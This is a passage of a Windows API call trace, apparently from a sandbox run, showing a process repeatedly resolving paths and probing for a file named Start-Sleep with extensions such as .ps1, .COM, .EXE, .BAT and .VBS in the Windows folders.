(dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.379] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.MSC", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.MSC", lpFilePart=0x0) returned 0x23 [0176.379] GetFullPathNameW (in: lpFileName="Start-Sleep.MSC", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpFilePart=0x0) returned 0x34 [0176.379] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.MSC", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.379] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.380] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.MSC", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.380] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.380] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.381] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0176.381] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.381] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.CPL", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep.CPL", lpFilePart=0x0) returned 0x23 [0176.381] GetFullPathNameW (in: lpFileName="Start-Sleep.CPL", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpFilePart=0x0) returned 0x34 [0176.381] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CPL", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.381] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.382] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep.CPL", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.382] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x944828c5, ftLastAccessTime.dwHighDateTime=0x1d7b058, ftLastWriteTime.dwLowDateTime=0x944828c5, ftLastWriteTime.dwHighDateTime=0x1d7b058, nFileSizeHigh=0x0, nFileSizeLow=0x100000)) returned 1 [0176.382] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.382] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0176.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\Start-Sleep", lpFilePart=0x0) returned 0x1f [0176.383] GetFullPathNameW (in: lpFileName="Start-Sleep", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpFilePart=0x0) returned 0x30 [0176.383] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.383] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.383] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\Start-Sleep", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.384] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.384] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.384] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.384] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.384] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0176.384] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.384] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.384] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.384] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.ps1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.ps1", lpFilePart=0x0) returned 0x1a [0176.384] GetFullPathNameW (in: lpFileName="Start-Sleep.ps1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpFilePart=0x0) returned 0x34 [0176.384] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.ps1", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.384] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.385] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.ps1", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.386] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.386] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.386] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0176.386] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.386] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.386] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.386] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.psm1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.psm1", lpFilePart=0x0) returned 0x1b [0176.386] GetFullPathNameW (in: lpFileName="Start-Sleep.psm1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpFilePart=0x0) returned 0x35 [0176.386] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psm1", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.386] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.387] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.psm1", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.388] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.388] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.388] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.388] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.388] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0176.388] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.388] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.388] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x1b [0176.388] GetFullPathNameW (in: lpFileName="Start-Sleep.psd1", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpFilePart=0x0) returned 0x35 [0176.388] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.psd1", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.388] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.389] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.psd1", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.389] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.389] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.389] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.390] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0176.390] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.390] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.390] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.390] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.COM", lpFilePart=0x0) returned 0x1a [0176.390] GetFullPathNameW (in: lpFileName="Start-Sleep.COM", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpFilePart=0x0) returned 0x34 [0176.390] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.COM", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.390] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.391] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.COM", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.391] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.391] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.391] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.393] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.EXE", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.393] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.394] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.EXE", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.395] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.395] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.BAT", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.395] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.399] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.BAT", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.399] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.399] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.CMD", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.399] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.400] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.CMD", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.401] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.401] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.401] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0176.401] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.401] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.401] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.VBS", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Start-Sleep.VBS", lpFilePart=0x0) returned 0x1a [0176.401] GetFullPathNameW (in: lpFileName="Start-Sleep.VBS", nBufferLength=0x105, lpBuffer=0x1b7de210, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpFilePart=0x0) returned 0x34 [0176.402] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\Start-Sleep.VBS", lpszLongPath=0x1b7de1f0, cchBuffer=0x104 | out: lpszLongPath="") returned 0x0 [0176.402] GetLongPathNameW (in: lpszShortPath="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp", lpszLongPath=0x1b7de160, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Temp") returned 0x28 [0176.402] FindFirstFileW (in: lpFileName="C:\\Windows\\Start-Sleep.VBS", lpFindFileData=0x1b7de420 | out: lpFindFileData=0x1b7de420*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0176.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de7a0) returned 1 [0176.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de740) returned 1 [0176.403] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de750) returned 1 [0176.403] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x1b7de830 | out: lpFileInformation=0x1b7de830*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd9a60a69, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xd9a60a69, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x6000)) returned 1 [0176.403] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7de710) returned 1 [0176.403] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7de780) returned 1 [0176.403] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1b7de270, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0176.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\Start-Sleep.VBE", nBufferLength=0x105, lpBuffer=0x1b7de210, 